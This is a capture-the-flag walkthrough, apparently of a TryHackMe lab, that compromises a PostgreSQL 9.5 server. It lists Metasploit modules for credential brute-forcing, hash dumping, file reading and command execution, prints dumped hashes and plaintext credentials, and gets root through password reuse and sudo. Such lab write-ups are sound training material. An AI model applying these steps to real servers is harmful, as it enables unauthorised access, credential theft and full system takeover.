This room is more focused on PostgresSQL on how misconfiguration could lead to Remote Code Execution.
NMAP SCAN
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Poster CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.21
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Always do recon, recon is the way to win. Take notes of versions.
Findings
Web (Port 80)
- Apache 2.4.18
- No robots.txt
Not much was found, but always run a directory scanner in case there are any hidden files on the web.
DB (Port 5432)
- We can pentest this port
psql -h <host> -U <username> -d <database> # Remote connection
- We can enumerate user credentials using Metasploit.
auxiliary/scanner/postgres/postgres_login
Found valid credentials :[+] 10.10.94.103:5432 - Login Successful: postgres:password@template1
3. We can use another module to execute commands.auxiliary/admin/postgres/postgres_sql
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
4. Now we can try dumping some hashes using another moduleauxiliary/scanner/postgres/postgres_hashdump
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
5. We can also read files using a moduleauxiliary/admin/postgres/postgres_readfile
6. We can also run another module for command injection.exploit/multi/postgres/postgres_copy_from_program_cmd_exec
We now have a shell.
Privilege Escalation
- Found credentials in config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
?>
- User Dark cannot run sudo
- DB password is reused for user alison, we are now user alison
- Check sudo -l
User alison may run the following commands on ubuntu: (ALL : ALL) ALL
- Simply run
sudo /bin/bash
for easy root.